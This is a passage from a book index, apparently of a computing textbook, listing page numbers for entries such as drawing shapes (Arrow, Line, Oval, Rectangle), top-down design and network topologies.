309-310, 314, 316, 319, 321, 325, 328-329,
331-332, 334, 343-344, 348-354, 356, 441,
855, 868, 938, 1018-1019, 1026, 1034-1036,
1052

Arrow, 1052
Line, 1050, 1052
Oval, 1050
Rectangle, 1050

Top-down design, 322, 509
Topologies, 627, 879